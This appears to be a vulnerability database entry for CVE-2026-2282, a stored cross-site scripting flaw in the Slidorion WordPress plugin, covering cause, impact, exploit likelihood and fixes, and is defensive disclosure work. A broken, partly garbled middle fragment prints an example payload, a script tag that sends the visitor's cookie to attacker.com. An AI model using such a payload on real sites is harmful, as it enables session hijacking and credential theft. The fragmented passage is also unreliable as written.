
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2282 is a Stored Cross-Site Scripting (XSS) vulnerability in the Slidorion plugin for WordPress, affecting all versions up to and including 1.0.2. The flaw arises from insufficient input sanitization and output escaping in admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts into pages. Exploitation is limited to multi-site WordPress installations or those where unfiltered_html has been disabled. It carries a CVSS v3.1 base score of 4.4 (Medium) (Feedly).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to properly sanitize administrator-supplied input in settings fields and escape output when rendering those values on pages. An authenticated attacker with administrator privileges can submit malicious JavaScript payloads through the plugin's admin settings interface; these payloads are then stored in the database and executed in the browsers of any user who visits an affected page. The attack vector is network-based with high attack complexity and high privileges required, and no user interaction is needed for the payload to execute once injected (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, defacement of site content, or redirection to malicious sites. The scope is marked as Changed, meaning the injected script can affect resources beyond the plugin's own security context. Confidentiality and integrity impacts are both rated Low, with no direct availability impact; however, in multi-site environments, the blast radius could extend across multiple sub-sites (Feedly).
There is no known public exploit code, active in-the-wild exploitation, or threat actor attribution associated with CVE-2026-2282 at this time. The EPSS score is approximately 0.022%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is further constrained by the requirement for administrator-level authentication and specific WordPress configurations (multi-site or unfiltered_html disabled) (Feedly).
unfiltered_html disabled that uses the Slidorion plugin version 1.0.2 or earlier.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.<script> tags or encoded JavaScript (e.g., <script>, javascript:) within Slidorion plugin option rows in the wp_options table.Users should update the Slidorion plugin to a version beyond 1.0.2 that includes fixes for input sanitization and output escaping. If no patched version is yet available, administrators should consider deactivating or removing the plugin until a fix is released. As an additional precaution, ensure that administrator accounts are protected with strong, unique passwords and multi-factor authentication to reduce the risk of unauthorized access that could enable exploitation (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."